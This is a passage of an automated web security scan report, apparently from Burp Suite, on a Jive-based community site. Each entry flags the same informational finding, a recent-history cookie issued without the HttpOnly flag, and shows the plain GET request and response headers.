Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343036353b312c35333137323b312c35343035383b312c35333135383b312c34373636333b312c35333331323b312c35333235323b312c35333331393b312c35333037353b312c35333334333b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.166. https://www.x.com/message/215254  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343035383b312c35333137323b312c35333235323b312c35333135383b312c34373636333b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.167. https://www.x.com/message/215264  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333838343b312c35333937373b312c35333135383b312c34373636333b312c35333137323b312c35343035383b312c35343036353b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.168. https://www.x.com/message/215276  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333937373b312c35343036353b312c35343035383b312c34373636333b312c35333838343b312c35333135383b312c35333137323b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.169. https://www.x.com/message/215291  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34373636333b312c35343035383b312c35333137323b312c35333135383b312c35333235323b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.170. https://www.x.com/people/BaldGeek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.171. https://www.x.com/people/CorinneSherman  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38393433393b332c323030383b332c35333735313b332c35333436333b332c35353331393b332c35333437343b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.172. https://www.x.com/people/GiancarloUk2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.173. https://www.x.com/people/IndieReign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.174. https://www.x.com/people/JasonVenner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.175. https://www.x.com/people/MrcheckAPX  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.176. https://www.x.com/people/PP_Igor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.177. https://www.x.com/people/PP_MTS_Andre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.178. https://www.x.com/people/PP_MTS_Chad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.179. https://www.x.com/people/PP_MTS_GuidoT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.180. https://www.x.com/people/PP_MTS_Magarvin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35333639373b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.181. https://www.x.com/people/PP_MTS_Patrick  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133313833303b332c3132393239303b332c3133373135383b332c3133373331333b332c3132323335343b332c3133393730313b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.182. https://www.x.com/people/PayPalXadmin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.183. https://www.x.com/people/PayPal_Carolyn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.184. https://www.x.com/people/PayPal_Sudha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
